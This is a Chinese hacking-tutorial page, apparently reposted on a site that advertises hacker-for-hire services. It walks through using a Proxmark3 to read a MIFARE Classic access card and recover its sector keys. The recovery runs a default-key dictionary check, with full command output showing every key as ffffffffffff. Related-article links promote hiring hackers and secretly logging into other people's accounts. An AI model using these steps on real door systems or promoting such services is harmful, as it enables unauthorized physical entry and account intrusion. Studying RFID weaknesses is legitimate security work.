找黑客平台

RFID Hacking ④:ProxMark3 破解门禁

访客4年前黑客资讯1128

  国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的 *** ,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)

  

  北上广不相信眼泪 16集

  在这一背景下,我们不经思考:门禁系统作为企业物理之一道屏障,这些硬件基础设施安全是否一直都被忽视?

  0×01 准备工作

  

  Linux、Windows环境搭建可参考:RFID Hacking②:PM3入门指南 一文。

  

  1.1 进入PM3工作终端

   /dev/ttyACM0

  1.2 测试天线

  proxmark3> hw tune # LF antenna: 29.98 V @ 125.00 kHz # LF antenna: 30.39 V @ 134.00 kHz # LF optimal: 36.30 V @ 129.03 kHz # HF antenna: 27.90 V @ 13.56 MHz proxmark3>

  1.3 设备固件

  proxmark3> hw ver#db# Prox/RFID mark3 RFID instrument #db# bootrom: /-suspect 2015-04-02 15:12:04 #db# os: /-suspect 2015-04-02 15:12:11 #db# HF FPGA image built on 2015/03/09 at 08:41:42

  0×02 爆破&枚举秘钥

  2.1 读取卡片

  proxmark3> hf 14a readerATQA : 04 00 UID : 2c f0 55 0b SAK : 08 [2] TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 proprietary non iso14443a-4 card found, RATS not supported

  2.2 执行NESTED攻击,枚举&爆破key:

  proxmark3> hf mf chk *1 ? tNo key specified,try default keys chk default key[0] ffffffffffff chk default key[1] 000000000000 chk default key[2] a0a1a2a3a4a5 chk default key[3] b0b1b2b3b4b5 chk default key[4] aabbccddeeff chk default key[5] 4d3a99c351dd chk default key[6] 1a982c7e459a chk default key[7] d3f7d3f7d3f7 chk default key[8] 714c5c886e97 chk default key[9] 587ee5f9350f chk default key[10] a0478cc39091 chk default key[11] 533cb6c723f6 chk default key[12] 8fd0a4f256e9 --SectorsCnt:0 block no:0x03 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:1 block no:0x07 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:2 block no:0x0b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:3 block no:0x0f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:4 block no:0x13 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:5 block no:0x17 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:6 block no:0x1b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:7 block no:0x1f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:8 block no:0x23 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:9 block no:0x27 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:10 block no:0x2b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:11 block no:0x2f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:12 block no:0x33 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:13 block no:0x37 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:14 block no:0x3b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:15 block no:0x3f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:0 block no:0x03 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:1 block no:0x07 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:2 block no:0x0b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:3 block no:0x0f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:4 block no:0x13 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:5 block no:0x17 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:6 block no:0x1b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:7 block no:0x1f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:8 block no:0x23 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:9 block no:0x27 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:10 block no:0x2b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:11 block no:0x2f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:12 block no:0x33 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:13 block no:0x37 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:14 block no:0x3b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:15 block no:0x3f key type:B key count:13 Found valid key:[ffffffffffff] proxmark3>

标签: RFID Hacking ④:ProxMark3 破解门禁
返回列表

上一篇:能打的产品经理,如何保证项目如期上线

下一篇:微信短视频加速,张小龙的步子不妨更大一些!

相关文章

先办事黑客在线接单(先办事后付款黑客)_好平台推荐

题记:但凡发生事故,家属情绪就没有不稳定的。每一个死者家属,除了演好一个情绪稳定的人,别无选择。 5月16日下午,甘肃定西市临洮县的洮河河道内,发生了一家四口溺水失踪的事故。 接警以后...

余额宝充值?(花呗放大招!提额仅需充值余额宝)

余额宝充值(花呗放大招!提额仅需充值余额宝) 据移动支付网了解,9月9日,花呗宣布推出新产品“花呗额度快充”,首批邀请了1000万名用户体验,后期逐步开放。 据官方解释,只要余额宝资金锁定多少,花...

淘宝账号评论引流技巧(2019新防封防删技术)

淘宝账号评论引流技巧(2019新防封防删技术)

淘宝购物是我们经常做的一件事情,但是大家有没有想过通过淘宝去引流呢?今天我们就来教大家利用淘宝账号评论引流的技巧,2019年新版技术,防删防封号的那种! 一.  太特么后悔吸粉大法 该方法简单的说就是...

13条黑客守则(黑客守则读后感)

13条黑客守则(黑客守则读后感)

本文导读目录: 1、网络的黑客有什么用?就是入侵别人系统的,检查网站漏洞,还有什么 2、黑客的道德品质 3、什么是黑客?做黑客犯不犯法?黑客做哪些坏事? 4、说不上什么恶意,但是被欺负的孩...

问我什么时候去接你

证明她还没有接受你的爱,但是她也不讨厌你,她说怕欠你的人情就说明你努力是有希望的,你就看她其它的有什么需要帮忙的。 你女朋友回来,你应该直接说去接她,而不是问他用不用你接。其实如果你直接说去接,可能...

私人黑客联系方式_怎么能偷偷登录别人的快手号

家中以前大客厅的音箱用的手机蓝牙多声道一体那类,相近回音壁但是比回音壁那类变大许多 ,用于看电视剧还好,但是看电视剧差了点味儿,并且有一个难题无法忍受便是底噪,再加上近期恰好大客厅的电视背景墙准备梳理...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.